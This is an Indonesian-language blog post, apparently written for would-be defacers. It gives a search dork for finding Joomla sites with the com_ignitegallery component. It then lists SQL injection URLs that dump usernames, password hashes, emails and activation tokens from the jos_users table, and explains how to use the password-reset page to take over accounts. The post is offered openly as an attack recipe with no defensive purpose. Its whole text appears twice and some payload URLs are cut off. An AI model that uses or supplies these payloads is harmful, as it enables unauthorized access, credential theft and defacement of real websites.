untuk deface jomla emang agak sedikit butuh kerja keras untuk cri target yang memiliki settingan default
mungkin ini bisa membantu klo ada yang kurang mohon di tambahkan sebelum menertawakan
maklum nubie pool :D
Hack Joomla Component :
Proof Of Concept :
Dork : inurl:com_ignitegallery
Exploit : /index.php?option=com_ignitegallery&task=view& gallery=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+jos_users--&Itemid=18
Reset Pass Joomla :
/index.php?option=com_user&view=reset
trus klo ditanya email tinggal ditambahin :
/index.php?option=com_ignitegallery&task=view& gallery=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10+from+jos_users--&Ite
trus klo token yg ditanya :
/index.php?option=com_ignitegallery&task=view& gallery=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from
untuk lebih jelasnya cba tanya ke mbak yutube usaha dikit ya hehhehhe :D
mungkin ini bisa membantu klo ada yang kurang mohon di tambahkan sebelum menertawakan
maklum nubie pool :D
Hack Joomla Component :
Proof Of Concept :
Dork : inurl:com_ignitegallery
Exploit : /index.php?option=com_ignitegallery&task=view& gallery=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+jos_users--&Itemid=18
Reset Pass Joomla :
/index.php?option=com_user&view=reset
trus klo ditanya email tinggal ditambahin :
/index.php?option=com_ignitegallery&task=view& gallery=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10+from+jos_users--&Ite
trus klo token yg ditanya :
/index.php?option=com_ignitegallery&task=view& gallery=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from
untuk lebih jelasnya cba tanya ke mbak yutube usaha dikit ya hehhehhe :D
0 komentar:
Speak up your mind
Tell us what you're thinking... !